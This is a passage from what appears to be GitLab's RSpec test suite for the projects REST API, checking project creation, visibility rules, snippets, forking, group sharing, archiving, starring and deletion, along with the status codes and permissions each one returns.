expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_falsey
end
it 'sets a project as allowing merge only if all discussions are resolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: true)
post api('/projects', user), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_truthy
end
it 'ignores import_url when it is nil' do
project = attributes_for(:project, import_url: nil)
post api('/projects', user), project
expect(response).to have_http_status(201)
end
context 'when a visibility level is restricted' do
let(:project_param) { attributes_for(:project, visibility: 'public') }
before do
stub_application_setting(restricted_visibility_levels: [Gitlab::VisibilityLevel::PUBLIC])
end
it 'does not allow a non-admin to use a restricted visibility level' do
post api('/projects', user), project_param
expect(response).to have_http_status(400)
expect(json_response['message']['visibility_level'].first).to(
match('restricted by your GitLab administrator')
)
end
it 'allows an admin to override restricted visibility settings' do
post api('/projects', admin), project_param
expect(json_response['visibility']).to eq('public')
end
end
end
describe 'GET /users/:user_id/projects/' do
let!(:public_project) { create(:project, :public, name: 'public_project', creator_id: user4.id, namespace: user4.namespace) }
it 'returns error when user not found' do
get api('/users/9999/projects/')
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 User Not Found')
end
it 'returns projects filtered by user' do
get api("/users/#{user4.id}/projects/", user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.map { |project| project['id'] }).to contain_exactly(public_project.id)
end
end
describe 'POST /projects/user/:id' do
before do
expect(project).to be_persisted
end
it 'creates new project without path but with name and returns 201' do
expect { post api("/projects/user/#{user.id}", admin), name: 'Foo Project' }.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.last
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('foo-project')
end
it 'creates new project with name and path and returns 201' do
expect { post api("/projects/user/#{user.id}", admin), path: 'path-project-Foo', name: 'Foo Project' }
.to change { Project.count }.by(1)
expect(response).to have_http_status(201)
project = Project.last
expect(project.name).to eq('Foo Project')
expect(project.path).to eq('path-project-Foo')
end
it 'responds with 400 on failure and does not create a project' do
expect { post api("/projects/user/#{user.id}", admin) }
.not_to change { Project.count }
expect(response).to have_http_status(400)
expect(json_response['error']).to eq('name is missing')
end
it 'assigns attributes to project' do
project = attributes_for(:project, {
issues_enabled: false,
merge_requests_enabled: false,
wiki_enabled: false,
request_access_enabled: true
})
post api("/projects/user/#{user.id}", admin), project
expect(response).to have_http_status(201)
project.each_pair do |k, v|
next if %i[has_external_issue_tracker path].include?(k)
expect(json_response[k.to_s]).to eq(v)
end
end
it 'sets a project as public' do
project = attributes_for(:project, visibility: 'public')
post api("/projects/user/#{user.id}", admin), project
expect(response).to have_http_status(201)
expect(json_response['visibility']).to eq('public')
end
it 'sets a project as internal' do
project = attributes_for(:project, visibility: 'internal')
post api("/projects/user/#{user.id}", admin), project
expect(response).to have_http_status(201)
expect(json_response['visibility']).to eq('internal')
end
it 'sets a project as private' do
project = attributes_for(:project, visibility: 'private')
post api("/projects/user/#{user.id}", admin), project
expect(json_response['visibility']).to eq('private')
end
it 'sets a project as allowing outdated diff discussions to automatically resolve' do
project = attributes_for(:project, resolve_outdated_diff_discussions: false)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['resolve_outdated_diff_discussions']).to be_falsey
end
it 'sets a project as allowing outdated diff discussions to automatically resolve if resolve_outdated_diff_discussions is true' do
project = attributes_for(:project, resolve_outdated_diff_discussions: true)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['resolve_outdated_diff_discussions']).to be_truthy
end
it 'sets a project as allowing merge even if build fails' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: false)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_falsey
end
it 'sets a project as allowing merge only if pipeline succeeds' do
project = attributes_for(:project, only_allow_merge_if_pipeline_succeeds: true)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to be_truthy
end
it 'sets a project as allowing merge even if discussions are unresolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: false)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_falsey
end
it 'sets a project as allowing merge only if all discussions are resolved' do
project = attributes_for(:project, only_allow_merge_if_all_discussions_are_resolved: true)
post api("/projects/user/#{user.id}", admin), project
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to be_truthy
end
end
describe "POST /projects/:id/uploads" do
before do
project
end
it "uploads the file and returns its info" do
post api("/projects/#{project.id}/uploads", user), file: fixture_file_upload(Rails.root + "spec/fixtures/dk.png", "image/png")
expect(response).to have_http_status(201)
expect(json_response['alt']).to eq("dk")
expect(json_response['url']).to start_with("/uploads/")
expect(json_response['url']).to end_with("/dk.png")
end
end
describe 'GET /projects/:id' do
context 'when unauthenticated' do
it 'returns the public projects' do
public_project = create(:project, :public)
get api("/projects/#{public_project.id}")
expect(response).to have_http_status(200)
expect(json_response['id']).to eq(public_project.id)
expect(json_response['description']).to eq(public_project.description)
expect(json_response['default_branch']).to eq(public_project.default_branch)
expect(json_response.keys).not_to include('permissions')
end
end
context 'when authenticated as an admin' do
it 'returns a project by id including repository_storage' do
project
project_member
group = create(:group)
link = create(:project_group_link, project: project, group: group)
get api("/projects/#{project.id}", admin)
expect(response).to have_http_status(200)
expect(json_response['id']).to eq(project.id)
expect(json_response['description']).to eq(project.description)
expect(json_response['default_branch']).to eq(project.default_branch)
expect(json_response['tag_list']).to be_an Array
expect(json_response['archived']).to be_falsey
expect(json_response['visibility']).to be_present
expect(json_response['ssh_url_to_repo']).to be_present
expect(json_response['http_url_to_repo']).to be_present
expect(json_response['web_url']).to be_present
expect(json_response['owner']).to be_a Hash
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to be_present
expect(json_response['issues_enabled']).to be_present
expect(json_response['merge_requests_enabled']).to be_present
expect(json_response['wiki_enabled']).to be_present
expect(json_response['jobs_enabled']).to be_present
expect(json_response['snippets_enabled']).to be_present
expect(json_response['container_registry_enabled']).to be_present
expect(json_response['created_at']).to be_present
expect(json_response['last_activity_at']).to be_present
expect(json_response['shared_runners_enabled']).to be_present
expect(json_response['creator_id']).to be_present
expect(json_response['namespace']).to be_present
expect(json_response['avatar_url']).to be_nil
expect(json_response['star_count']).to be_present
expect(json_response['forks_count']).to be_present
expect(json_response['public_jobs']).to be_present
expect(json_response['shared_with_groups']).to be_an Array
expect(json_response['shared_with_groups'].length).to eq(1)
expect(json_response['shared_with_groups'][0]['group_id']).to eq(group.id)
expect(json_response['shared_with_groups'][0]['group_name']).to eq(group.name)
expect(json_response['shared_with_groups'][0]['group_access_level']).to eq(link.group_access)
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to eq(project.only_allow_merge_if_pipeline_succeeds)
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to eq(project.only_allow_merge_if_all_discussions_are_resolved)
expect(json_response['repository_storage']).to eq(project.repository_storage)
end
end
context 'when authenticated as a regular user' do
before do
project
project_member
end
it 'returns a project by id' do
group = create(:group)
link = create(:project_group_link, project: project, group: group)
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['id']).to eq(project.id)
expect(json_response['description']).to eq(project.description)
expect(json_response['default_branch']).to eq(project.default_branch)
expect(json_response['tag_list']).to be_an Array
expect(json_response['archived']).to be_falsey
expect(json_response['visibility']).to be_present
expect(json_response['ssh_url_to_repo']).to be_present
expect(json_response['http_url_to_repo']).to be_present
expect(json_response['web_url']).to be_present
expect(json_response['owner']).to be_a Hash
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to be_present
expect(json_response['issues_enabled']).to be_present
expect(json_response['merge_requests_enabled']).to be_present
expect(json_response['wiki_enabled']).to be_present
expect(json_response['jobs_enabled']).to be_present
expect(json_response['snippets_enabled']).to be_present
expect(json_response['resolve_outdated_diff_discussions']).to eq(project.resolve_outdated_diff_discussions)
expect(json_response['container_registry_enabled']).to be_present
expect(json_response['created_at']).to be_present
expect(json_response['last_activity_at']).to be_present
expect(json_response['shared_runners_enabled']).to be_present
expect(json_response['creator_id']).to be_present
expect(json_response['namespace']).to be_present
expect(json_response['import_status']).to be_present
expect(json_response).to include("import_error")
expect(json_response['avatar_url']).to be_nil
expect(json_response['star_count']).to be_present
expect(json_response['forks_count']).to be_present
expect(json_response['public_jobs']).to be_present
expect(json_response['ci_config_path']).to be_nil
expect(json_response['shared_with_groups']).to be_an Array
expect(json_response['shared_with_groups'].length).to eq(1)
expect(json_response['shared_with_groups'][0]['group_id']).to eq(group.id)
expect(json_response['shared_with_groups'][0]['group_name']).to eq(group.name)
expect(json_response['shared_with_groups'][0]['group_access_level']).to eq(link.group_access)
expect(json_response['only_allow_merge_if_pipeline_succeeds']).to eq(project.only_allow_merge_if_pipeline_succeeds)
expect(json_response['only_allow_merge_if_all_discussions_are_resolved']).to eq(project.only_allow_merge_if_all_discussions_are_resolved)
expect(json_response).not_to have_key('repository_storage')
end
it 'returns a project by path name' do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['name']).to eq(project.name)
end
it 'returns a 404 error if not found' do
get api('/projects/42', user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'returns a 404 error if user is not a member' do
other_user = create(:user)
get api("/projects/#{project.id}", other_user)
expect(response).to have_http_status(404)
end
it 'handles users with dots' do
dot_user = create(:user, username: 'dot.user')
project = create(:project, creator_id: dot_user.id, namespace: dot_user.namespace)
get api("/projects/#{CGI.escape(project.full_path)}", dot_user)
expect(response).to have_http_status(200)
expect(json_response['name']).to eq(project.name)
end
it 'exposes namespace fields' do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['namespace']).to eq({
'id' => user.namespace.id,
'name' => user.namespace.name,
'path' => user.namespace.path,
'kind' => user.namespace.kind,
'full_path' => user.namespace.full_path,
'parent_id' => nil,
'plan' => nil
})
end
it "does not include statistics by default" do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response).not_to include 'statistics'
end
it "includes statistics if requested" do
get api("/projects/#{project.id}", user), statistics: true
expect(response).to have_http_status(200)
expect(json_response).to include 'statistics'
end
it "includes import_error if user can admin project" do
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response).to include("import_error")
end
it "does not include import_error if user cannot admin project" do
get api("/projects/#{project.id}", user3)
expect(response).to have_http_status(200)
expect(json_response).not_to include("import_error")
end
context 'links exposure' do
it 'exposes related resources full URIs' do
get api("/projects/#{project.id}", user)
links = json_response['_links']
expect(links['self']).to end_with("/api/v4/projects/#{project.id}")
expect(links['issues']).to end_with("/api/v4/projects/#{project.id}/issues")
expect(links['merge_requests']).to end_with("/api/v4/projects/#{project.id}/merge_requests")
expect(links['repo_branches']).to end_with("/api/v4/projects/#{project.id}/repository/branches")
expect(links['labels']).to end_with("/api/v4/projects/#{project.id}/labels")
expect(links['events']).to end_with("/api/v4/projects/#{project.id}/events")
expect(links['members']).to end_with("/api/v4/projects/#{project.id}/members")
end
it 'filters related URIs when their feature is not enabled' do
project = create(:project, :public,
:merge_requests_disabled,
:issues_disabled,
creator_id: user.id,
namespace: user.namespace)
get api("/projects/#{project.id}", user)
links = json_response['_links']
expect(links.has_key?('merge_requests')).to be_falsy
expect(links.has_key?('issues')).to be_falsy
expect(links['self']).to end_with("/api/v4/projects/#{project.id}")
end
end
describe 'permissions' do
context 'all projects' do
before do
project.team << [user, :master]
end
it 'contains permission information' do
get api("/projects", user)
expect(response).to have_http_status(200)
expect(json_response.first['permissions']['project_access']['access_level'])
.to eq(Gitlab::Access::MASTER)
expect(json_response.first['permissions']['group_access']).to be_nil
end
end
context 'personal project' do
it 'sets project access and returns 200' do
project.team << [user, :master]
get api("/projects/#{project.id}", user)
expect(response).to have_http_status(200)
expect(json_response['permissions']['project_access']['access_level'])
.to eq(Gitlab::Access::MASTER)
expect(json_response['permissions']['group_access']).to be_nil
end
end
context 'group project' do
let(:project2) { create(:project, group: create(:group)) }
before do
project2.group.add_owner(user)
end
it 'sets the owner and returns 200' do
get api("/projects/#{project2.id}", user)
expect(response).to have_http_status(200)
expect(json_response['permissions']['project_access']).to be_nil
expect(json_response['permissions']['group_access']['access_level'])
.to eq(Gitlab::Access::OWNER)
end
end
end
end
end
describe 'GET /projects/:id/users' do
shared_examples_for 'project users response' do
it 'returns the project users' do
get api("/projects/#{project.id}/users", current_user)
user = project.namespace.owner
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.size).to eq(1)
first_user = json_response.first
expect(first_user['username']).to eq(user.username)
expect(first_user['name']).to eq(user.name)
expect(first_user.keys).to contain_exactly(*%w[name username id state avatar_url web_url])
end
end
context 'when unauthenticated' do
it_behaves_like 'project users response' do
let(:project) { create(:project, :public) }
let(:current_user) { nil }
end
end
context 'when authenticated' do
context 'valid request' do
it_behaves_like 'project users response' do
let(:current_user) { user }
end
end
it 'returns a 404 error if not found' do
get api('/projects/42/users', user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'returns a 404 error if user is not a member' do
other_user = create(:user)
get api("/projects/#{project.id}/users", other_user)
expect(response).to have_http_status(404)
end
end
end
describe 'GET /projects/:id/snippets' do
before do
snippet
end
it 'returns an array of project snippets' do
get api("/projects/#{project.id}/snippets", user)
expect(response).to have_http_status(200)
expect(response).to include_pagination_headers
expect(json_response).to be_an Array
expect(json_response.first['title']).to eq(snippet.title)
end
end
describe 'GET /projects/:id/snippets/:snippet_id' do
it 'returns a project snippet' do
get api("/projects/#{project.id}/snippets/#{snippet.id}", user)
expect(response).to have_http_status(200)
expect(json_response['title']).to eq(snippet.title)
end
it 'returns a 404 error if snippet id not found' do
get api("/projects/#{project.id}/snippets/1234", user)
expect(response).to have_http_status(404)
end
end
describe 'POST /projects/:id/snippets' do
it 'creates a new project snippet' do
post api("/projects/#{project.id}/snippets", user),
title: 'api test', file_name: 'sample.rb', code: 'test', visibility: 'private'
expect(response).to have_http_status(201)
expect(json_response['title']).to eq('api test')
end
it 'returns a 400 error if invalid snippet is given' do
post api("/projects/#{project.id}/snippets", user)
expect(response).to have_http_status(400)
end
end
describe 'PUT /projects/:id/snippets/:snippet_id' do
it 'updates an existing project snippet' do
put api("/projects/#{project.id}/snippets/#{snippet.id}", user),
code: 'updated code'
expect(response).to have_http_status(200)
expect(json_response['title']).to eq('example')
expect(snippet.reload.content).to eq('updated code')
end
it 'updates an existing project snippet with new title' do
put api("/projects/#{project.id}/snippets/#{snippet.id}", user),
title: 'other api test'
expect(response).to have_http_status(200)
expect(json_response['title']).to eq('other api test')
end
end
describe 'DELETE /projects/:id/snippets/:snippet_id' do
before do
snippet
end
it 'deletes existing project snippet' do
expect do
delete api("/projects/#{project.id}/snippets/#{snippet.id}", user)
expect(response).to have_http_status(204)
end.to change { Snippet.count }.by(-1)
end
it 'returns 404 when deleting unknown snippet id' do
delete api("/projects/#{project.id}/snippets/1234", user)
expect(response).to have_http_status(404)
end
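# The '412 response' shared example (defined elsewhere in this suite) is assumed
# to replay the DELETE with a stale If-Unmodified-Since header and expect 412.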
it_behaves_like '412 response' do
let(:request) { api("/projects/#{project.id}/snippets/#{snippet.id}", user) }
end
end
describe 'GET /projects/:id/snippets/:snippet_id/raw' do
it 'gets a raw project snippet' do
get api("/projects/#{project.id}/snippets/#{snippet.id}/raw", user)
expect(response).to have_http_status(200)
end
it 'returns a 404 error if raw project snippet not found' do
get api("/projects/#{project.id}/snippets/5555/raw", user)
expect(response).to have_http_status(404)
end
end
describe 'fork management' do
let(:project_fork_target) { create(:project) }
let(:project_fork_source) { create(:project, :public) }
describe 'POST /projects/:id/fork/:forked_from_id' do
let(:new_project_fork_source) { create(:project, :public) }
it "is not available for non admin users" do
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", user)
expect(response).to have_http_status(403)
end
it 'allows project to be forked from an existing project' do
expect(project_fork_target.forked?).not_to be_truthy
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
expect(response).to have_http_status(201)
project_fork_target.reload
expect(project_fork_target.forked_from_project.id).to eq(project_fork_source.id)
expect(project_fork_target.forked_project_link).not_to be_nil
expect(project_fork_target.forked?).to be_truthy
end
it 'refreshes the forks count cache' do
expect(project_fork_source.forks_count).to be_zero
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
expect(project_fork_source.forks_count).to eq(1)
end
it 'fails if the forked_from project does not exist' do
post api("/projects/#{project_fork_target.id}/fork/9999", admin)
expect(response).to have_http_status(404)
end
it 'fails with 409 if already forked' do
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
project_fork_target.reload
expect(project_fork_target.forked_from_project.id).to eq(project_fork_source.id)
post api("/projects/#{project_fork_target.id}/fork/#{new_project_fork_source.id}", admin)
expect(response).to have_http_status(409)
project_fork_target.reload
expect(project_fork_target.forked_from_project.id).to eq(project_fork_source.id)
expect(project_fork_target.forked?).to be_truthy
end
end
describe 'DELETE /projects/:id/fork' do
it "is not visible to users outside group" do
delete api("/projects/#{project_fork_target.id}/fork", user)
expect(response).to have_http_status(404)
end
context 'when users belong to project group' do
let(:project_fork_target) { create(:project, group: create(:group)) }
before do
project_fork_target.group.add_owner user
project_fork_target.group.add_developer user2
end
context 'for a forked project' do
before do
post api("/projects/#{project_fork_target.id}/fork/#{project_fork_source.id}", admin)
project_fork_target.reload
expect(project_fork_target.forked_from_project).not_to be_nil
expect(project_fork_target.forked?).to be_truthy
end
it 'makes forked project unforked' do
delete api("/projects/#{project_fork_target.id}/fork", admin)
expect(response).to have_http_status(204)
project_fork_target.reload
expect(project_fork_target.forked_from_project).to be_nil
expect(project_fork_target.forked?).not_to be_truthy
end
it_behaves_like '412 response' do
let(:request) { api("/projects/#{project_fork_target.id}/fork", admin) }
end
end
it 'is forbidden to non-owner users' do
delete api("/projects/#{project_fork_target.id}/fork", user2)
expect(response).to have_http_status(403)
end
it 'is idempotent if not forked' do
expect(project_fork_target.forked_from_project).to be_nil
delete api("/projects/#{project_fork_target.id}/fork", admin)
expect(response).to have_http_status(304)
expect(project_fork_target.reload.forked_from_project).to be_nil
end
end
end
end
describe "POST /projects/:id/share" do
let(:group) { create(:group) }
it "shares project with group" do
expires_at = 10.days.from_now.to_date
expect do
post api("/projects/#{project.id}/share", user), group_id: group.id, group_access: Gitlab::Access::DEVELOPER, expires_at: expires_at
end.to change { ProjectGroupLink.count }.by(1)
expect(response).to have_http_status(201)
expect(json_response['group_id']).to eq(group.id)
expect(json_response['group_access']).to eq(Gitlab::Access::DEVELOPER)
expect(json_response['expires_at']).to eq(expires_at.to_s)
end
it "returns a 400 error when group id is not given" do
post api("/projects/#{project.id}/share", user), group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(400)
end
it "returns a 400 error when access level is not given" do
post api("/projects/#{project.id}/share", user), group_id: group.id
expect(response).to have_http_status(400)
end
it "returns a 400 error when sharing is disabled" do
project.namespace.update(share_with_group_lock: true)
post api("/projects/#{project.id}/share", user), group_id: group.id, group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(400)
end
it 'returns a 404 error when user cannot read group' do
private_group = create(:group, :private)
post api("/projects/#{project.id}/share", user), group_id: private_group.id, group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(404)
end
it 'returns a 404 error when group does not exist' do
post api("/projects/#{project.id}/share", user), group_id: 1234, group_access: Gitlab::Access::DEVELOPER
expect(response).to have_http_status(404)
end
it "returns a 400 error when wrong params passed" do
post api("/projects/#{project.id}/share", user), group_id: group.id, group_access: 1234
expect(response).to have_http_status(400)
expect(json_response['error']).to eq 'group_access does not have a valid value'
end
end
describe 'DELETE /projects/:id/share/:group_id' do
context 'for a valid group' do
let(:group) { create(:group, :public) }
before do
create(:project_group_link, group: group, project: project)
end
it 'returns 204 when deleting a group share' do
delete api("/projects/#{project.id}/share/#{group.id}", user)
expect(response).to have_http_status(204)
expect(project.project_group_links).to be_empty
end
it_behaves_like '412 response' do
let(:request) { api("/projects/#{project.id}/share/#{group.id}", user) }
end
end
it 'returns a 400 when group id is not an integer' do
delete api("/projects/#{project.id}/share/foo", user)
expect(response).to have_http_status(400)
end
it 'returns a 404 error when group link does not exist' do
delete api("/projects/#{project.id}/share/1234", user)
expect(response).to have_http_status(404)
end
it 'returns a 404 error when project does not exist' do
delete api("/projects/123/share/1234", user)
expect(response).to have_http_status(404)
end
end
describe 'PUT /projects/:id' do
before do
expect(project).to be_persisted
expect(user).to be_persisted
expect(user3).to be_persisted
expect(user4).to be_persisted
expect(project3).to be_persisted
expect(project4).to be_persisted
expect(project_member2).to be_persisted
expect(project_member).to be_persisted
end
it 'returns 400 when nothing sent' do
project_param = {}
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(400)
expect(json_response['error']).to match('at least one parameter must be provided')
end
context 'when unauthenticated' do
it 'returns authentication error' do
project_param = { name: 'bar' }
put api("/projects/#{project.id}"), project_param
expect(response).to have_http_status(401)
end
end
context 'when authenticated as project owner' do
it 'updates name' do
project_param = { name: 'bar' }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates visibility_level' do
project_param = { visibility: 'public' }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates visibility_level from public to private' do
project3.update_attributes({ visibility_level: Gitlab::VisibilityLevel::PUBLIC })
project_param = { visibility: 'private' }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
expect(json_response['visibility']).to eq('private')
end
it 'does not update name to existing name' do
project_param = { name: project3.name }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(400)
expect(json_response['message']['name']).to eq(['has already been taken'])
end
it 'updates request_access_enabled' do
project_param = { request_access_enabled: false }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(200)
expect(json_response['request_access_enabled']).to eq(false)
end
it 'updates approvals_before_merge' do
project_param = { approvals_before_merge: 3 }
put api("/projects/#{project.id}", user), project_param
expect(response).to have_http_status(200)
expect(json_response['approvals_before_merge']).to eq(3)
end
it 'updates path & name to existing path & name in different namespace' do
project_param = { path: project4.path, name: project4.name }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates jobs_enabled' do
project_param = { jobs_enabled: true }
put api("/projects/#{project3.id}", user), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
end
context 'when authenticated as project master' do
it 'updates path' do
project_param = { path: 'bar' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'updates other attributes' do
project_param = { issues_enabled: true,
wiki_enabled: true,
snippets_enabled: true,
merge_requests_enabled: true,
description: 'new description' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(200)
project_param.each_pair do |k, v|
expect(json_response[k.to_s]).to eq(v)
end
end
it 'does not update path to existing path' do
project_param = { path: project.path }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(400)
expect(json_response['message']['path']).to eq(['has already been taken'])
end
it 'does not update name' do
project_param = { name: 'bar' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(403)
end
it 'does not update visibility_level' do
project_param = { visibility: 'public' }
put api("/projects/#{project3.id}", user4), project_param
expect(response).to have_http_status(403)
end
end
context 'when authenticated as project developer' do
it 'does not update other attributes' do
project_param = { path: 'bar',
issues_enabled: true,
wiki_enabled: true,
snippets_enabled: true,
merge_requests_enabled: true,
description: 'new description',
request_access_enabled: true }
put api("/projects/#{project.id}", user3), project_param
expect(response).to have_http_status(403)
end
end
end
describe 'POST /projects/:id/archive' do
context 'on an unarchived project' do
it 'archives the project' do
post api("/projects/#{project.id}/archive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_truthy
end
end
context 'on an archived project' do
before do
project.archive!
end
it 'remains archived' do
post api("/projects/#{project.id}/archive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_truthy
end
end
context 'user without archiving rights to the project' do
before do
project.team << [user3, :developer]
end
it 'rejects the action' do
post api("/projects/#{project.id}/archive", user3)
expect(response).to have_http_status(403)
end
end
end
describe 'POST /projects/:id/unarchive' do
context 'on an unarchived project' do
it 'remains unarchived' do
post api("/projects/#{project.id}/unarchive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_falsey
end
end
context 'on an archived project' do
before do
project.archive!
end
it 'unarchives the project' do
post api("/projects/#{project.id}/unarchive", user)
expect(response).to have_http_status(201)
expect(json_response['archived']).to be_falsey
end
end
context 'user without archiving rights to the project' do
before do
project.team << [user3, :developer]
end
it 'rejects the action' do
post api("/projects/#{project.id}/unarchive", user3)
expect(response).to have_http_status(403)
end
end
end
describe 'POST /projects/:id/star' do
context 'on an unstarred project' do
it 'stars the project' do
expect { post api("/projects/#{project.id}/star", user) }.to change { project.reload.star_count }.by(1)
expect(response).to have_http_status(201)
expect(json_response['star_count']).to eq(1)
end
end
context 'on a starred project' do
before do
user.toggle_star(project)
project.reload
end
it 'does not modify the star count' do
expect { post api("/projects/#{project.id}/star", user) }.not_to change { project.reload.star_count }
expect(response).to have_http_status(304)
end
end
end
describe 'POST /projects/:id/unstar' do
context 'on a starred project' do
before do
user.toggle_star(project)
project.reload
end
it 'unstars the project' do
expect { post api("/projects/#{project.id}/unstar", user) }.to change { project.reload.star_count }.by(-1)
expect(response).to have_http_status(201)
expect(json_response['star_count']).to eq(0)
end
end
context 'on an unstarred project' do
it 'does not modify the star count' do
expect { post api("/projects/#{project.id}/unstar", user) }.not_to change { project.reload.star_count }
expect(response).to have_http_status(304)
end
end
end
describe 'DELETE /projects/:id' do
context 'when authenticated as user' do
it 'removes project' do
delete api("/projects/#{project.id}", user)
expect(response).to have_http_status(202)
expect(json_response['message']).to eql('202 Accepted')
end
it_behaves_like '412 response' do
let(:success_status) { 202 }
let(:request) { api("/projects/#{project.id}", user) }
end
it 'does not remove a project if not an owner' do
user3 = create(:user)
project.team << [user3, :developer]
delete api("/projects/#{project.id}", user3)
expect(response).to have_http_status(403)
end
it 'does not remove a non-existent project' do
delete api('/projects/1328', user)
expect(response).to have_http_status(404)
end
it 'does not remove a project not attached to user' do
delete api("/projects/#{project.id}", user2)
expect(response).to have_http_status(404)
end
end
context 'when authenticated as admin' do
it 'removes any existing project' do
delete api("/projects/#{project.id}", admin)
expect(response).to have_http_status(202)
expect(json_response['message']).to eql('202 Accepted')
end
it 'does not remove a non-existent project' do
delete api('/projects/1328', admin)
expect(response).to have_http_status(404)
end
it_behaves_like '412 response' do
let(:success_status) { 202 }
let(:request) { api("/projects/#{project.id}", admin) }
end
end
end
describe 'POST /projects/:id/fork' do
let(:project) do
create(:project, :repository, creator: user, namespace: user.namespace)
end
let(:group) { create(:group) }
let(:group2) do
group = create(:group, name: 'group2_name')
group.add_owner(user2)
group
end
before do
project.add_reporter(user2)
end
context 'when authenticated' do
it 'forks if user has sufficient access to project' do
post api("/projects/#{project.id}/fork", user2)
expect(response).to have_http_status(201)
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to eq(project.path)
expect(json_response['owner']['id']).to eq(user2.id)
expect(json_response['namespace']['id']).to eq(user2.namespace.id)
expect(json_response['forked_from_project']['id']).to eq(project.id)
expect(json_response['import_status']).to eq('scheduled')
expect(json_response).to include("import_error")
end
it 'forks if user is admin' do
post api("/projects/#{project.id}/fork", admin)
expect(response).to have_http_status(201)
expect(json_response['name']).to eq(project.name)
expect(json_response['path']).to eq(project.path)
expect(json_response['owner']['id']).to eq(admin.id)
expect(json_response['namespace']['id']).to eq(admin.namespace.id)
expect(json_response['forked_from_project']['id']).to eq(project.id)
expect(json_response['import_status']).to eq('scheduled')
expect(json_response).to include("import_error")
end
it 'fails on missing project access for the project to fork' do
new_user = create(:user)
post api("/projects/#{project.id}/fork", new_user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'fails if forked project exists in the user namespace' do
post api("/projects/#{project.id}/fork", user)
expect(response).to have_http_status(409)
expect(json_response['message']['name']).to eq(['has already been taken'])
expect(json_response['message']['path']).to eq(['has already been taken'])
end
it 'fails if project to fork from does not exist' do
post api('/projects/424242/fork', user)
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'forks with explicit own user namespace id' do
post api("/projects/#{project.id}/fork", user2), namespace: user2.namespace.id
expect(response).to have_http_status(201)
expect(json_response['owner']['id']).to eq(user2.id)
end
it 'forks with explicit own user name as namespace' do
post api("/projects/#{project.id}/fork", user2), namespace: user2.username
expect(response).to have_http_status(201)
expect(json_response['owner']['id']).to eq(user2.id)
end
it 'forks to another user when admin' do
post api("/projects/#{project.id}/fork", admin), namespace: user2.username
expect(response).to have_http_status(201)
expect(json_response['owner']['id']).to eq(user2.id)
end
it 'fails if trying to fork to another user when not admin' do
post api("/projects/#{project.id}/fork", user2), namespace: admin.namespace.id
expect(response).to have_http_status(404)
end
it 'fails if trying to fork to non-existent namespace' do
post api("/projects/#{project.id}/fork", user2), namespace: 42424242
expect(response).to have_http_status(404)
expect(json_response['message']).to eq('404 Target Namespace Not Found')
end
it 'forks to owned group' do
